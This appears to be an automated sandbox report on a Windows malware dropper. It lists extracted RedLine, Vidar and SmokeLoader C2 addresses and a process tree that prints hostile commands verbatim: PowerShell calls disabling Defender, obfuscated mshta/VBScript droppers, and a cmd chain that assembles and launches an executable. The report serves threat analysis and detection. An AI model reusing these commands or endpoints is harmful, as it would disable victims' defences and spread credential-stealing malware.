Analysis
-
max time kernel
7s -
max time network
151s -
platform
windows10_x64 -
resource
win10-en-20211104 -
submitted
21/11/2021, 13:56
Static task
static1
Behavioral task
behavioral1
Sample
b0d129a1b07f3501b7737ae293cbba00.exe
Resource
win7-en-20211104
Behavioral task
behavioral2
Sample
b0d129a1b07f3501b7737ae293cbba00.exe
Resource
win10-en-20211104
General
-
Target
b0d129a1b07f3501b7737ae293cbba00.exe
-
Size
10.5MB
-
MD5
b0d129a1b07f3501b7737ae293cbba00
-
SHA1
fc48fab64bcbe7a62ad99f1899703ade98f07804
-
SHA256
9ddc809e6e1d32f3c3b1fc1e5382fad699e6336a270bb91fef2a4c0e13f39d14
-
SHA512
2deb70fb4f62bcbf3ecbd3a6205f4fd3dae51820be5ab973fc4367b90bef022c4cf5097e506c6c11d39193b8526756412a4f336b2303d305d15da6acc8f9b403
Malware Config
Extracted
socelars
http://www.gianninidesign.com/
Extracted
metasploit
windows/single_exec
Extracted
redline
user2121
135.181.129.119:4805
Extracted
vidar
48.5
933
https://koyu.space/@tttaj
-
profile_id
933
Extracted
smokeloader
2020
http://membro.at/upload/
http://jeevanpunetha.com/upload/
http://misipu.cn/upload/
http://zavodooo.ru/upload/
http://targiko.ru/upload/
http://vues3d.com/upload/
Extracted
redline
media17plus
91.121.67.60:51630
Signatures
-
MetaSploit
Detected malicious payload which is part of the Metasploit Framework, likely generated with msfvenom or similar.
-
Process spawned unexpected child process 1 IoCs
This typically indicates the parent process was compromised via an exploit or macro.
description pid pid_target Process procid_target Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 6448 1688 rundll32.exe 198 -
RedLine
RedLine Stealer is a malware family written in C#, first appearing in early 2020.
-
RedLine Payload 5 IoCs
resource yara_rule behavioral2/memory/592-289-0x0000000000400000-0x0000000000420000-memory.dmp family_redline behavioral2/memory/1144-296-0x0000000000418F02-mapping.dmp family_redline behavioral2/memory/1144-332-0x0000000004F30000-0x0000000005536000-memory.dmp family_redline behavioral2/memory/1144-290-0x0000000000400000-0x0000000000420000-memory.dmp family_redline behavioral2/memory/592-292-0x0000000000418F06-mapping.dmp family_redline -
SmokeLoader
Modular backdoor trojan in use since 2014.
-
Socelars Payload 2 IoCs
resource yara_rule behavioral2/files/0x000400000001abc6-158.dat family_socelars behavioral2/files/0x000400000001abc6-190.dat family_socelars -
Vidar Stealer 2 IoCs
resource yara_rule behavioral2/memory/4944-378-0x0000000000400000-0x00000000004D8000-memory.dmp family_vidar behavioral2/memory/4944-374-0x00000000021E0000-0x00000000022B5000-memory.dmp family_vidar -
resource yara_rule behavioral2/files/0x000600000001abb3-122.dat aspack_v212_v242 behavioral2/files/0x000600000001abb2-123.dat aspack_v212_v242 behavioral2/files/0x000600000001abb2-125.dat aspack_v212_v242 behavioral2/files/0x000600000001abb3-128.dat aspack_v212_v242 behavioral2/files/0x000400000001abbe-129.dat aspack_v212_v242 behavioral2/files/0x000400000001abbe-130.dat aspack_v212_v242 -
Downloads MZ/PE file
-
Executes dropped EXE 15 IoCs
pid Process 4008 setup_install.exe 520 AwTxlmCABrJz7EAdimlbFcu2.exe 692 Wed12f81f1ede1e.exe 1388 Wed123d89a91c256e57.exe 1532 Wed124bd92a370.exe 1600 Wed12e5a6a551c39b62a.exe 1508 Wed126a3d2b0eb7.exe 1688 wmiprvse.exe 1764 Wed129e9e1f612b5.exe 1252 Wed12f0ec01aa0d.exe 1348 Wed12640230114af0.exe 2716 Wed12f7252371e9b59.exe 2492 Wed12f0ec01aa0d.exe 404 Wed1245c5fe22f.exe 3492 Wed12581881318b9e75.exe -
Loads dropped DLL 5 IoCs
pid Process 4008 setup_install.exe 4008 setup_install.exe 4008 setup_install.exe 4008 setup_install.exe 4008 setup_install.exe -
Legitimate hosting services abused for malware hosting/C2 1 TTPs
-
Looks up external IP address via web service 6 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.
flow ioc 29 ip-api.com 44 ipinfo.io 45 ipinfo.io 197 ipinfo.io 198 ipinfo.io 266 ipinfo.io -
Looks up geolocation information via web service
Uses a legitimate geolocation service to find the infected system's geolocation info.
-
Suspicious use of SetThreadContext 1 IoCs
description pid Process procid_target PID 1252 set thread context of 2492 1252 Wed12f0ec01aa0d.exe 102 -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.
-
Program crash 10 IoCs
pid pid_target Process procid_target 4412 516 WerFault.exe 126 4572 3168 WerFault.exe 5612 516 WerFault.exe 126 4508 516 WerFault.exe 126 5936 444 WerFault.exe 155 2884 5580 WerFault.exe 158 5588 516 WerFault.exe 126 2872 516 WerFault.exe 126 6692 516 WerFault.exe 126 6080 4952 WerFault.exe 201 -
Creates scheduled task(s) 1 TTPs 2 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
pid Process 6840 schtasks.exe 2860 schtasks.exe -
Kills process with taskkill 7 IoCs
pid Process 1200 taskkill.exe 6680 taskkill.exe 3784 taskkill.exe 6392 taskkill.exe 5012 taskkill.exe 5820 taskkill.exe 7628 taskkill.exe -
Runs ping.exe 1 TTPs 1 IoCs
pid Process 6784 PING.EXE -
Suspicious use of AdjustPrivilegeToken 35 IoCs
description pid Process Token: SeDebugPrivilege 1688 wmiprvse.exe Token: SeCreateTokenPrivilege 1508 Wed126a3d2b0eb7.exe Token: SeAssignPrimaryTokenPrivilege 1508 Wed126a3d2b0eb7.exe Token: SeLockMemoryPrivilege 1508 Wed126a3d2b0eb7.exe Token: SeIncreaseQuotaPrivilege 1508 Wed126a3d2b0eb7.exe Token: SeMachineAccountPrivilege 1508 Wed126a3d2b0eb7.exe Token: SeTcbPrivilege 1508 Wed126a3d2b0eb7.exe Token: SeSecurityPrivilege 1508 Wed126a3d2b0eb7.exe Token: SeTakeOwnershipPrivilege 1508 Wed126a3d2b0eb7.exe Token: SeLoadDriverPrivilege 1508 Wed126a3d2b0eb7.exe Token: SeSystemProfilePrivilege 1508 Wed126a3d2b0eb7.exe Token: SeSystemtimePrivilege 1508 Wed126a3d2b0eb7.exe Token: SeProfSingleProcessPrivilege 1508 Wed126a3d2b0eb7.exe Token: SeIncBasePriorityPrivilege 1508 Wed126a3d2b0eb7.exe Token: SeCreatePagefilePrivilege 1508 Wed126a3d2b0eb7.exe Token: SeCreatePermanentPrivilege 1508 Wed126a3d2b0eb7.exe Token: SeBackupPrivilege 1508 Wed126a3d2b0eb7.exe Token: SeRestorePrivilege 1508 Wed126a3d2b0eb7.exe Token: SeShutdownPrivilege 1508 Wed126a3d2b0eb7.exe Token: SeDebugPrivilege 1508 Wed126a3d2b0eb7.exe Token: SeAuditPrivilege 1508 Wed126a3d2b0eb7.exe Token: SeSystemEnvironmentPrivilege 1508 Wed126a3d2b0eb7.exe Token: SeChangeNotifyPrivilege 1508 Wed126a3d2b0eb7.exe Token: SeRemoteShutdownPrivilege 1508 Wed126a3d2b0eb7.exe Token: SeUndockPrivilege 1508 Wed126a3d2b0eb7.exe Token: SeSyncAgentPrivilege 1508 Wed126a3d2b0eb7.exe Token: SeEnableDelegationPrivilege 1508 Wed126a3d2b0eb7.exe Token: SeManageVolumePrivilege 1508 Wed126a3d2b0eb7.exe Token: SeImpersonatePrivilege 1508 Wed126a3d2b0eb7.exe Token: SeCreateGlobalPrivilege 1508 Wed126a3d2b0eb7.exe Token: 31 1508 Wed126a3d2b0eb7.exe Token: 32 1508 Wed126a3d2b0eb7.exe Token: 33 1508 Wed126a3d2b0eb7.exe Token: 34 1508 Wed126a3d2b0eb7.exe Token: 35 1508 Wed126a3d2b0eb7.exe -
Suspicious use of WriteProcessMemory 64 IoCs
description pid Process procid_target PID 3576 wrote to memory of 4008 3576 b0d129a1b07f3501b7737ae293cbba00.exe 69 PID 3576 wrote to memory of 4008 3576 b0d129a1b07f3501b7737ae293cbba00.exe 69 PID 3576 wrote to memory of 4008 3576 b0d129a1b07f3501b7737ae293cbba00.exe 69 PID 4008 wrote to memory of 4444 4008 setup_install.exe 72 PID 4008 wrote to memory of 4444 4008 setup_install.exe 72 PID 4008 wrote to memory of 4444 4008 setup_install.exe 72 PID 4008 wrote to memory of 4340 4008 setup_install.exe 73 PID 4008 wrote to memory of 4340 4008 setup_install.exe 73 PID 4008 wrote to memory of 4340 4008 setup_install.exe 73 PID 4444 wrote to memory of 4308 4444 cmd.exe 74 PID 4444 wrote to memory of 4308 4444 cmd.exe 74 PID 4444 wrote to memory of 4308 4444 cmd.exe 74 PID 4340 wrote to memory of 524 4340 cmd.exe 75 PID 4340 wrote to memory of 524 4340 cmd.exe 75 PID 4340 wrote to memory of 524 4340 cmd.exe 75 PID 4008 wrote to memory of 800 4008 setup_install.exe 76 PID 4008 wrote to memory of 800 4008 setup_install.exe 76 PID 4008 wrote to memory of 800 4008 setup_install.exe 76 PID 4008 wrote to memory of 3172 4008 setup_install.exe 77 PID 4008 wrote to memory of 3172 4008 setup_install.exe 77 PID 4008 wrote to memory of 3172 4008 setup_install.exe 77 PID 4008 wrote to memory of 3232 4008 setup_install.exe 78 PID 4008 wrote to memory of 3232 4008 setup_install.exe 78 PID 4008 wrote to memory of 3232 4008 setup_install.exe 78 PID 4008 wrote to memory of 4488 4008 setup_install.exe 84 PID 4008 wrote to memory of 4488 4008 setup_install.exe 84 PID 4008 wrote to memory of 4488 4008 setup_install.exe 84 PID 4008 wrote to memory of 3800 4008 setup_install.exe 79 PID 4008 wrote to memory of 3800 4008 setup_install.exe 79 PID 4008 wrote to memory of 3800 4008 setup_install.exe 79 PID 4008 wrote to memory of 2852 4008 setup_install.exe 80 PID 4008 wrote to memory of 2852 4008 setup_install.exe 80 PID 4008 wrote to memory of 2852 4008 setup_install.exe 80 PID 4008 wrote to memory of 4240 4008 setup_install.exe 81 PID 4008 wrote to memory of 4240 4008 setup_install.exe 81 PID 4008 wrote to memory of 4240 4008 setup_install.exe 81 PID 4008 wrote to memory of 4100 4008 setup_install.exe 82 PID 4008 wrote to memory of 4100 4008 setup_install.exe 82 PID 4008 wrote to memory of 4100 4008 setup_install.exe 82 PID 4008 wrote to memory of 3272 4008 setup_install.exe 83 PID 4008 wrote to memory of 3272 4008 setup_install.exe 83 PID 4008 wrote to memory of 3272 4008 setup_install.exe 83 PID 4008 wrote to memory of 3160 4008 setup_install.exe 91 PID 4008 wrote to memory of 3160 4008 setup_install.exe 91 PID 4008 wrote to memory of 3160 4008 setup_install.exe 91 PID 4488 wrote to memory of 520 4488 cmd.exe 196 PID 4488 wrote to memory of 520 4488 cmd.exe 196 PID 4488 wrote to memory of 520 4488 cmd.exe 196 PID 4008 wrote to memory of 816 4008 setup_install.exe 86 PID 4008 wrote to memory of 816 4008 setup_install.exe 86 PID 4008 wrote to memory of 816 4008 setup_install.exe 86 PID 4008 wrote to memory of 348 4008 setup_install.exe 90 PID 4008 wrote to memory of 348 4008 setup_install.exe 90 PID 4008 wrote to memory of 348 4008 setup_install.exe 90 PID 3232 wrote to memory of 692 3232 cmd.exe 87 PID 3232 wrote to memory of 692 3232 cmd.exe 87 PID 3232 wrote to memory of 692 3232 cmd.exe 87 PID 4008 wrote to memory of 1048 4008 setup_install.exe 88 PID 4008 wrote to memory of 1048 4008 setup_install.exe 88 PID 4008 wrote to memory of 1048 4008 setup_install.exe 88 PID 4008 wrote to memory of 1196 4008 setup_install.exe 89 PID 4008 wrote to memory of 1196 4008 setup_install.exe 89 PID 4008 wrote to memory of 1196 4008 setup_install.exe 89 PID 3172 wrote to memory of 1388 3172 cmd.exe 115
Processes
-
C:\Users\Admin\AppData\Local\Temp\b0d129a1b07f3501b7737ae293cbba00.exe"C:\Users\Admin\AppData\Local\Temp\b0d129a1b07f3501b7737ae293cbba00.exe"1⤵
- Suspicious use of WriteProcessMemory
PID:3576 -
C:\Users\Admin\AppData\Local\Temp\7zS8FD105A5\setup_install.exe"C:\Users\Admin\AppData\Local\Temp\7zS8FD105A5\setup_install.exe"2⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious use of WriteProcessMemory
PID:4008 -
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c powershell -inputformat none -outputformat none -NonInteractive -Command Set-MpPreference -DisableRealtimeMonitoring $true -SubmitSamplesConsent NeverSend -MAPSReporting Disable3⤵
- Suspicious use of WriteProcessMemory
PID:4444 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -inputformat none -outputformat none -NonInteractive -Command Set-MpPreference -DisableRealtimeMonitoring $true -SubmitSamplesConsent NeverSend -MAPSReporting Disable4⤵PID:4308
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c powershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Local\Temp"3⤵
- Suspicious use of WriteProcessMemory
PID:4340 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Local\Temp"4⤵PID:524
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Wed12f0ec01aa0d.exe /mixtwo3⤵PID:800
-
C:\Users\Admin\AppData\Local\Temp\7zS8FD105A5\Wed12f0ec01aa0d.exeWed12f0ec01aa0d.exe /mixtwo4⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
PID:1252 -
C:\Users\Admin\AppData\Local\Temp\7zS8FD105A5\Wed12f0ec01aa0d.exeWed12f0ec01aa0d.exe /mixtwo5⤵
- Executes dropped EXE
PID:2492 -
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c taskkill /im "Wed12f0ec01aa0d.exe" /f & erase "C:\Users\Admin\AppData\Local\Temp\7zS8FD105A5\Wed12f0ec01aa0d.exe" & exit6⤵PID:2636
-
C:\Windows\SysWOW64\taskkill.exetaskkill /im "Wed12f0ec01aa0d.exe" /f7⤵
- Kills process with taskkill
PID:3784
-
-
-
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Wed123d89a91c256e57.exe3⤵
- Suspicious use of WriteProcessMemory
PID:3172 -
C:\Users\Admin\AppData\Local\Temp\7zS8FD105A5\Wed123d89a91c256e57.exeWed123d89a91c256e57.exe4⤵
- Executes dropped EXE
PID:1388
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Wed12f81f1ede1e.exe3⤵
- Suspicious use of WriteProcessMemory
PID:3232 -
C:\Users\Admin\AppData\Local\Temp\7zS8FD105A5\Wed12f81f1ede1e.exeWed12f81f1ede1e.exe4⤵
- Executes dropped EXE
PID:692 -
C:\Users\Admin\AppData\Local\Temp\is-QLT65.tmp\Wed12f81f1ede1e.tmp"C:\Users\Admin\AppData\Local\Temp\is-QLT65.tmp\Wed12f81f1ede1e.tmp" /SL5="$40138,140785,56832,C:\Users\Admin\AppData\Local\Temp\7zS8FD105A5\Wed12f81f1ede1e.exe"5⤵PID:2572
-
C:\Users\Admin\AppData\Local\Temp\7zS8FD105A5\Wed12f81f1ede1e.exe"C:\Users\Admin\AppData\Local\Temp\7zS8FD105A5\Wed12f81f1ede1e.exe" /SILENT6⤵PID:2860
-
C:\Users\Admin\AppData\Local\Temp\is-4VM97.tmp\Wed12f81f1ede1e.tmp"C:\Users\Admin\AppData\Local\Temp\is-4VM97.tmp\Wed12f81f1ede1e.tmp" /SL5="$50138,140785,56832,C:\Users\Admin\AppData\Local\Temp\7zS8FD105A5\Wed12f81f1ede1e.exe" /SILENT7⤵PID:1452
-
C:\Users\Admin\AppData\Local\Temp\is-PKGMK.tmp\winhostdll.exe"C:\Users\Admin\AppData\Local\Temp\is-PKGMK.tmp\winhostdll.exe" ss18⤵PID:3684
-
-
-
-
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Wed12640230114af0.exe3⤵PID:3800
-
C:\Users\Admin\AppData\Local\Temp\7zS8FD105A5\Wed12640230114af0.exeWed12640230114af0.exe4⤵
- Executes dropped EXE
PID:1348 -
C:\Users\Admin\AppData\Local\Temp\7zS8FD105A5\Wed12640230114af0.exe"C:\Users\Admin\AppData\Local\Temp\7zS8FD105A5\Wed12640230114af0.exe" -u5⤵PID:5084
-
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Wed126a3d2b0eb7.exe3⤵PID:2852
-
C:\Users\Admin\AppData\Local\Temp\7zS8FD105A5\Wed126a3d2b0eb7.exeWed126a3d2b0eb7.exe4⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:1508 -
C:\Windows\SysWOW64\cmd.execmd.exe /c taskkill /f /im chrome.exe5⤵PID:5804
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f /im chrome.exe6⤵
- Kills process with taskkill
PID:6392
-
-
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Wed124bd92a370.exe3⤵PID:4240
-
C:\Users\Admin\AppData\Local\Temp\7zS8FD105A5\Wed124bd92a370.exeWed124bd92a370.exe4⤵
- Executes dropped EXE
PID:1532
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Wed129e9e1f612b5.exe3⤵PID:4100
-
C:\Users\Admin\AppData\Local\Temp\7zS8FD105A5\Wed129e9e1f612b5.exeWed129e9e1f612b5.exe4⤵
- Executes dropped EXE
PID:1764
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Wed1292e7cced8ba.exe3⤵PID:3272
-
C:\Users\Admin\AppData\Local\Temp\7zS8FD105A5\Wed1292e7cced8ba.exeWed1292e7cced8ba.exe4⤵PID:1688
-
C:\Users\Admin\AppData\Local\Temp\LzmwAqmV.exe"C:\Users\Admin\AppData\Local\Temp\LzmwAqmV.exe"5⤵PID:4752
-
C:\Users\Admin\AppData\Local\Temp\Worldoffer.exe"C:\Users\Admin\AppData\Local\Temp\Worldoffer.exe"6⤵PID:4944
-
-
C:\Users\Admin\AppData\Local\Temp\setup.exe"C:\Users\Admin\AppData\Local\Temp\setup.exe"6⤵PID:516
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 516 -s 8087⤵
- Program crash
PID:4412
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 516 -s 8647⤵
- Program crash
PID:5612
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 516 -s 8727⤵
- Program crash
PID:4508
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 516 -s 9527⤵
- Program crash
PID:5588
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 516 -s 9287⤵
- Program crash
PID:2872
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 516 -s 9527⤵
- Program crash
PID:6692
-
-
-
C:\Users\Admin\AppData\Local\Temp\search_hyperfs_206.exe"C:\Users\Admin\AppData\Local\Temp\search_hyperfs_206.exe"6⤵PID:4928
-
C:\Windows\SysWOW64\mshta.exe"C:\Windows\System32\mshta.exe" vbsCrIPT:cLoSE( CrEaTeoBJeCt( "WscRIpT.sHElL" ).Run ( "cmd /R cOpY /Y ""C:\Users\Admin\AppData\Local\Temp\search_hyperfs_206.exe"" ..\kPBhgOaGQk.exe&& sTart ..\kPBhgOAGQK.ExE /PLQtzfgO0m8dRv4iYALOqi &If """" == """" for %M in (""C:\Users\Admin\AppData\Local\Temp\search_hyperfs_206.exe"" ) do taskkill -f -iM ""%~NxM"" ", 0 , truE) )7⤵PID:4992
-
-
-
C:\Users\Admin\AppData\Local\Temp\guixiangli-game.exe"C:\Users\Admin\AppData\Local\Temp\guixiangli-game.exe"6⤵PID:612
-
-
C:\Users\Admin\AppData\Local\Temp\Calculator Installation.exe"C:\Users\Admin\AppData\Local\Temp\Calculator Installation.exe"6⤵PID:4984
-
-
C:\Users\Admin\AppData\Local\Temp\chrome2.exe"C:\Users\Admin\AppData\Local\Temp\chrome2.exe"6⤵PID:1296
-
-
C:\Users\Admin\AppData\Local\Temp\chrome3.exe"C:\Users\Admin\AppData\Local\Temp\chrome3.exe"6⤵PID:1352
-
-
C:\Users\Admin\AppData\Local\Temp\chrome1.exe"C:\Users\Admin\AppData\Local\Temp\chrome1.exe"6⤵PID:2764
-
-
C:\Users\Admin\AppData\Local\Temp\Chrome5.exe"C:\Users\Admin\AppData\Local\Temp\Chrome5.exe"6⤵PID:5312
-
C:\Windows\System32\conhost.exe"C:\Windows\System32\conhost.exe" "C:\Users\Admin\AppData\Local\Temp\Chrome5.exe"7⤵PID:4012
-
-
-
C:\Users\Admin\AppData\Local\Temp\chrome update.exe"C:\Users\Admin\AppData\Local\Temp\chrome update.exe"6⤵PID:4952
-
C:\Windows\system32\WerFault.exeC:\Windows\system32\WerFault.exe -u -p 4952 -s 20047⤵
- Program crash
PID:6080
-
-
-
C:\Users\Admin\AppData\Local\Temp\inst1.exe"C:\Users\Admin\AppData\Local\Temp\inst1.exe"6⤵PID:3504
-
-
C:\Users\Admin\AppData\Local\Temp\PBrowserSetp42415.exe"C:\Users\Admin\AppData\Local\Temp\PBrowserSetp42415.exe"6⤵PID:1684
-
-
C:\Users\Admin\AppData\Local\Temp\chrome.exe"C:\Users\Admin\AppData\Local\Temp\chrome.exe"6⤵PID:3168
-
-
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Wed12d2139ce650c689.exe3⤵
- Suspicious use of WriteProcessMemory
PID:4488 -
C:\Users\Admin\AppData\Local\Temp\7zS8FD105A5\Wed12d2139ce650c689.exeWed12d2139ce650c689.exe4⤵PID:520
-
C:\Users\Admin\AppData\Local\Temp\7zS8FD105A5\Wed12d2139ce650c689.exeC:\Users\Admin\AppData\Local\Temp\7zS8FD105A5\Wed12d2139ce650c689.exe5⤵PID:1144
-
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Wed12f7252371e9b59.exe3⤵PID:816
-
C:\Users\Admin\AppData\Local\Temp\7zS8FD105A5\Wed12f7252371e9b59.exeWed12f7252371e9b59.exe4⤵
- Executes dropped EXE
PID:2716 -
C:\Users\Admin\AppData\Roaming\8144678.exe"C:\Users\Admin\AppData\Roaming\8144678.exe"5⤵PID:4364
-
-
C:\Users\Admin\AppData\Roaming\5546623.exe"C:\Users\Admin\AppData\Roaming\5546623.exe"5⤵PID:3860
-
C:\Users\Admin\AppData\Roaming\58542392\7839062778390627.exe"C:\Users\Admin\AppData\Roaming\58542392\7839062778390627.exe"6⤵PID:4532
-
-
-
C:\Users\Admin\AppData\Roaming\4233457.exe"C:\Users\Admin\AppData\Roaming\4233457.exe"5⤵PID:4888
-
-
C:\Users\Admin\AppData\Roaming\2547472.exe"C:\Users\Admin\AppData\Roaming\2547472.exe"5⤵PID:740
-
-
C:\Users\Admin\AppData\Roaming\8224169.exe"C:\Users\Admin\AppData\Roaming\8224169.exe"5⤵PID:600
-
-
C:\Users\Admin\AppData\Roaming\8880752.exe"C:\Users\Admin\AppData\Roaming\8880752.exe"5⤵PID:3088
-
C:\Users\Admin\AppData\Roaming\2936063.exe"C:\Users\Admin\AppData\Roaming\2936063.exe"6⤵PID:6460
-
C:\Windows\SysWOW64\mshta.exe"C:\Windows\System32\mshta.exe" vBSCrIpt:clOSE (cReAteobject ("WScripT.shEll" ). rUN( "C:\Windows\system32\cmd.exe /q /c cOpY /y ""C:\Users\Admin\AppData\Roaming\2936063.exe"" JYE8HiMhEASUD_.ExE&& sTART JYE8HiMhEASUD_.exE -p8pWd0QiD~JnefCwtTsZUP &iF """" == """" for %T iN ( ""C:\Users\Admin\AppData\Roaming\2936063.exe"" ) do taskkill /im ""%~nXT"" -F ", 0 , tRuE) )7⤵PID:4580
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /q /c cOpY /y "C:\Users\Admin\AppData\Roaming\2936063.exe" JYE8HiMhEASUD_.ExE&& sTART JYE8HiMhEASUD_.exE -p8pWd0QiD~JnefCwtTsZUP &iF "" == "" for %T iN ( "C:\Users\Admin\AppData\Roaming\2936063.exe") do taskkill /im "%~nXT" -F8⤵PID:5380
-
C:\Users\Admin\AppData\Local\Temp\JYE8HiMhEASUD_.ExEJYE8HiMhEASUD_.exE -p8pWd0QiD~JnefCwtTsZUP9⤵PID:3612
-
C:\Windows\SysWOW64\mshta.exe"C:\Windows\System32\mshta.exe" vBSCrIpt:clOSE (cReAteobject ("WScripT.shEll" ). rUN( "C:\Windows\system32\cmd.exe /q /c cOpY /y ""C:\Users\Admin\AppData\Local\Temp\JYE8HiMhEASUD_.ExE"" JYE8HiMhEASUD_.ExE&& sTART JYE8HiMhEASUD_.exE -p8pWd0QiD~JnefCwtTsZUP &iF ""-p8pWd0QiD~JnefCwtTsZUP "" == """" for %T iN ( ""C:\Users\Admin\AppData\Local\Temp\JYE8HiMhEASUD_.ExE"" ) do taskkill /im ""%~nXT"" -F ", 0 , tRuE) )10⤵PID:7128
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /q /c cOpY /y "C:\Users\Admin\AppData\Local\Temp\JYE8HiMhEASUD_.ExE" JYE8HiMhEASUD_.ExE&& sTART JYE8HiMhEASUD_.exE -p8pWd0QiD~JnefCwtTsZUP &iF "-p8pWd0QiD~JnefCwtTsZUP " == "" for %T iN ( "C:\Users\Admin\AppData\Local\Temp\JYE8HiMhEASUD_.ExE") do taskkill /im "%~nXT" -F11⤵PID:1744
-
-
-
C:\Windows\SysWOW64\mshta.exe"C:\Windows\System32\mshta.exe" vbSCripT: cLose( CreATeoBjEcT ( "wScRIPt.sHelL"). rUn( "cmd.EXE /C Echo bn3iV%DAtE%Dk>42aZkEWq.S & Echo | sEt /P = ""MZ"" > FXJzTR79.MB & cOpY /Y /B FXJZTR79.MB + CN140TT2.N + 37muPO_.Y +~XE1lP0T.TrJ +X8OKE3j.P + 42AZKEWQ.s U4MN~PZU.PL & stArT msiexec /Y .\U4Mn~pZU.PL ", 0 , TRuE ) )10⤵PID:1352
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /C Echo bn3iVÚtE%Dk>42aZkEWq.S & Echo | sEt /P = "MZ" > FXJzTR79.MB & cOpY /Y /B FXJZTR79.MB + CN140TT2.N+ 37muPO_.Y +~XE1lP0T.TrJ +X8OKE3j.P + 42AZKEWQ.s U4MN~PZU.PL & stArT msiexec /Y .\U4Mn~pZU.PL11⤵PID:6400
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" Echo "12⤵PID:2040
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" sEt /P = "MZ" 1>FXJzTR79.MB"12⤵PID:4968
-
-
C:\Windows\SysWOW64\msiexec.exemsiexec /Y .\U4Mn~pZU.PL12⤵PID:8072
-
-
-
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /im "2936063.exe" -F9⤵
- Kills process with taskkill
PID:5012
-
-
-
-
-
C:\Users\Admin\AppData\Roaming\1093705.exe"C:\Users\Admin\AppData\Roaming\1093705.exe"6⤵PID:5528
-
-
-
C:\Users\Admin\AppData\Roaming\2175358.exe"C:\Users\Admin\AppData\Roaming\2175358.exe"5⤵PID:1320
-
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Wed1245c5fe22f.exe3⤵PID:1048
-
C:\Users\Admin\AppData\Local\Temp\7zS8FD105A5\Wed1245c5fe22f.exeWed1245c5fe22f.exe4⤵
- Executes dropped EXE
PID:404 -
C:\Users\Admin\Pictures\Adobe Films\HreXZuDu0r6o6JRgluhm0Z6h.exe"C:\Users\Admin\Pictures\Adobe Films\HreXZuDu0r6o6JRgluhm0Z6h.exe"5⤵PID:5940
-
C:\Users\Admin\Documents\cD0sWg5x1CnmpGv4v7SMcdIU.exe"C:\Users\Admin\Documents\cD0sWg5x1CnmpGv4v7SMcdIU.exe"6⤵PID:868
-
C:\Users\Admin\Pictures\Adobe Films\aCxRpUWhGtlHmBbip7GUJW3t.exe"C:\Users\Admin\Pictures\Adobe Films\aCxRpUWhGtlHmBbip7GUJW3t.exe"7⤵PID:7588
-
-
C:\Users\Admin\Pictures\Adobe Films\7dOONL06IODpD5Uy3mge5Kx9.exe"C:\Users\Admin\Pictures\Adobe Films\7dOONL06IODpD5Uy3mge5Kx9.exe"7⤵PID:3248
-
-
C:\Users\Admin\Pictures\Adobe Films\xwfUe0OBb_Crcgirx5gWtVbx.exe"C:\Users\Admin\Pictures\Adobe Films\xwfUe0OBb_Crcgirx5gWtVbx.exe"7⤵PID:7376
-
-
C:\Users\Admin\Pictures\Adobe Films\KbKmWssaC3nCyaZ_xymEKdDp.exe"C:\Users\Admin\Pictures\Adobe Films\KbKmWssaC3nCyaZ_xymEKdDp.exe"7⤵PID:7436
-
-
C:\Users\Admin\Pictures\Adobe Films\fAyjHDpE5PPxLz7Qf6tpQ7GE.exe"C:\Users\Admin\Pictures\Adobe Films\fAyjHDpE5PPxLz7Qf6tpQ7GE.exe"7⤵PID:2040
-
-
C:\Users\Admin\Pictures\Adobe Films\1tIAqp6kGrnP6WyxC1y0hMdy.exe"C:\Users\Admin\Pictures\Adobe Films\1tIAqp6kGrnP6WyxC1y0hMdy.exe"7⤵PID:7652
-
